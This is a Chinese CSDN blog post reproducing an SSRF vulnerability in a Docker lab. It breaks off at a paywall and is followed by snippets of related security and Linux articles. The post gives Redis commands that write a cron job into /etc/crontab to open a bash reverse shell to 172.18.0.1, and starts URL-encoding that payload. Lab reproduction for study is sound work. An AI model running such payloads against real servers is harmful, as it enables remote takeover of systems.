利用docker进行的SSRF in java的漏洞复现

最新推荐文章于 2024-07-07 16:41:23 发布
最新推荐文章于 2024-07-07 16:41:23 发布
阅读量568 收藏 1
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Candyys/article/details/105475804
版权

1、环境搭建

显示错误:Service 'redis' failed to build: The command '/bin/sh -c set -ex     && yum -y update     && yum -y install gcc-c++ tcl wget' returned a non-zero code: 

服务“redis”生成失败:

未安装redis服务器导致,

这里执行docker-compose up --build            //building redis

编写脚本扫描内网开放端口的主机

通过ssrf 探测到内网中redis服务器 ‘172.19.0.2:6379’正常访问
构造脚本写入 目录‘/etc/crontab‘

```
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/172.18.0.1/21 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
```

进行url编码:

```
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn
最低0.47元/天 解锁文章
hu4wufu
关注
专栏目录
ssrf漏洞 java反_SSRF漏洞分析与利用
weixin_35431719的博客
02-22 1432
前言:总结了一些常见的姿势,以PHP为例,先上一张脑图,划√的是本文接下来实际操作的0x01 漏洞产生以curl为例,漏洞代码为ssrf.php$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $_GET['url']);#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURL...
Weblogic-SSRF漏洞复现
jklbnm12的博客
01-14 1198
应为这一阵正好在学习SSRF漏洞,又苦于本人太菜没有挖到SSRF,只能复现… 先贴出很早之前央视网SSRF可窥探内网(Weblogic SSRF案例):https://www.secpulse.com/archives/38967.html Weblogic中存在一个SSRF漏洞利用漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件 服务端请求伪造(Server-Side Request Forgery),是指Web服务提供从用户指定的URL读取数据并展示功能又未 对用户输
利用docker搭建漏洞环境,使用SSRF+Redis写入centos以及ubuntu的公钥,实现免密登录
最新发布
繁星
07-07 744
centos和ubuntu的步骤几乎相同,只是由于redis的保护机制,所以会有以下错误,导致部分属性无法修改,解决方法是将protected-mode关闭,使用以下命令;由于redis版本限制的问题,7.2.5的安全性过高,会导致ssh免密登录不成功,所以这里我拉取了5.0.5的版本接着利用同样的操作就可实现免密登录;
DockerBuild报错:The command ‘/bin/sh -c yum install -y vim‘ returned a non-zero code: 1
weixin_53402685的博客
06-15 6687
dockerfile构建遇见的问题
hadoop运行jar包出现错误代码为127的解决方案_Exit code: 127
chenjie的博客
09-28 6141
今天在运行程序的时候新发现的一个错误(Exit code: 127),下面提供解决方案,希望能帮助大家。下面是错误的信息: Job job_1601252515583_0001 failed with state FAILED due to: Application application_1601252515583_0001 failed 2 times due to AM Container for appattempt_1601252515583_0001_000002 exited with ex
追洞计划 | Gitlab CI Lint API未授权 SSRF漏洞(CVE-2021-22214)
Ms08067安全实验室
06-22 6173
文章来源|MS08067 Web安全知识星球本文作者:Taoing(Web安全攻防合伙人) GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来...
漏洞复现—Weblogic CVE-2017-10271/CVE-2018-2628/CVE-2018-2894/CVE-2020-14882/ssrf/weak_password
weixin_45556536的博客
11-27 2081
这里写目录标题基础知识漏洞原理涉及版本漏洞特征漏洞复现—CVE-2017-10271 'wls-wsat' XMLDecoder 反序列化漏洞CVE-2018-2628 Weblogic T3协议反序列化漏洞CVE-2018-2894 Weblogic任意文件上传漏洞CVE-2020-14882 weblogic 未授权命令执行漏洞漏洞修复 基础知识 Weblogic是oracle推出的application server,由于其具有支持EJB、JSP、JMS、XML等多种语言、可扩展性、快速开发等多种特性
apache漏洞复现-多后缀解析漏洞,换行解析漏洞,2.4.49,2.4.50
weixin_64655821的博客
10-13 2149
apache漏洞复现-多后缀解析漏洞,换行解析漏洞,2.4.49,2.4.50
docker+lnmp 报错小结,以laradock为例,其它同理
stone
04-19 8944
1、安装PHP扩展失败 用vagrant + centos7 + lnmp开发都快两年,这是一个很好用的本地开发环境。对于我来说,它更像是一台真正的linux电脑,能真正直接把握它的每一处地方。而且现在内存都普遍8G以上的本子,加上SSD真的是毫无压力。 但时间一长,暴露出很多很烦人的东西: (1)只对本地有用,到了线上环境又是一堆恶心的依赖报错。当...
国光师傅的SSRF靶场docker环境.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,靶场为安全从业者提供了一个模拟真实网络环境的平台。通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面提升其实战能力。 其次,靶场是渗透测试和漏洞攻防演练的理想场所。在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与沟通。在攻防对抗中,往往需要多人协同作战,团队成员之间需要密切配合,共同制定攻击和防御策略。这有助于培养团队合作意识,提高协同作战的效率。 此外,靶场为学习者提供了一个安全的学习环境。在靶场中,学生可以通过实际操作掌握安全知识,了解攻击技术和防御策略。这样的学习方式比传统的理论课程更加生动直观,有助于深化对安全领域的理解。 最后,靶场也是安全社区交流的平台。在靶场中,安全从业者可以分享攻防经验,交流最新的安全威胁情报,共同探讨解决方案。这有助于建立更广泛的安全社区,推动整个行业的发展。 总体而言,靶场在信息安全领域具有重要地位,为安全专业人员提供了实战演练的机会,促进了团队协作与沟通,为学习者提供了安全的学习环境,同时也是安全社区交流的重要平台。通过靶场的实践操作,安全从业者能够更好地应对不断演变的网络威胁,提高整体的安全水平。
SSRF安全威胁在JAVA代码中的应用
angjiu8534的博客
05-26 814
如上图所示代码,在进行外部url调用的时候,引入了SSRF检测:ssrfChecker.checkUrlWithoutConnection(url)机制。 SSRF安全威胁: 很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程...
linux安装gcc命令步骤(centos安装gcc命令)
sunsineq的专栏
01-14 7000
linux安装gcc命令步骤(centos安装gcc命令) >一、前言 本文介绍在CentOS7.8系统下使用YUM升级GCC版本的相关操作步骤。 CentOS7默认安装的gcc版本是4.8版本,gcc 4.8最主要的一个特性就是全面支持C++11,如果不清楚什么用的也没关系,简单说一些C++11标准的程序都需要gcc 4.8以上版本的gcc编译器编译。很多工具依赖的是更高版本的gcc,比如编译MySQL 8.0(8.0.16以上版本是C++14标准,需gcc 5.3以上版本)、Redis 6.
redis安装过程报错解决方案
微微一笑满城空
09-27 690
问题一 出现如下错误 : cd src && make all make[1]: Entering directory '/xx/xx/redis-x.x.x/src' CC adlist.o /bin/sh: cc: command not found make[1]: *** [adlist.o] Error 127 make[1]: Leaving directory '/xx/xx/redis-x.x.x/src' make: *** [all] Error 2
centos7 yum fastestmirror不能使用
热门推荐
flx的博客
11-21 1万+
[root@localhost ~]# yum install lrzsz Loaded plugins: fastestmirror Could not retrieve mirrorlist http://mirrorlist.centos.org/?release=7&arch=x86_64&repo=os&infra=stock error was 14: curl#6 - "Cou
liunx安装软件报错yum install gcc-c++
Jodl666的博客
10-23 5786
 http://ftp.sjtu.edu.cn/centos/6.9/os/x86_64/repodata/repomd.xml:  [Errno 14] PYCURL ERROR 22 - "The requested URL returned error: 404 Not Found" 尝试其他镜像 错误原因是 http://ftp.sjtu.edu.cn/centos/6.9/os/x86...
CentOS 7 安装 gcc && gcc-c++
weixin_44238530的博客
03-05 1891
Centos 7默认安装的gcc版本为4.8,这里安装更高版本(7.3) #1. 安装centos-release-scl sudo yum install -y centos-release-scl #2. 安装devtoolset, sudo yum install -y devtoolset-7 #sudo yum install -y devtoolset-7-gcc* #3. 激活对应的devtoolset #scl enable devtoolset-7 bash #这条激活命令只对本次会
利用Docker高效搭建Java Web开发环境指南
通过这个教程,读者可以学习如何利用Docker的优势(如轻量级、快速部署和跨平台兼容性)来构建和部署Java Web应用,提升开发和运维效率。对于希望采用Docker技术的开发者或运维人员来说,这是一个实用且具有参考价值...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值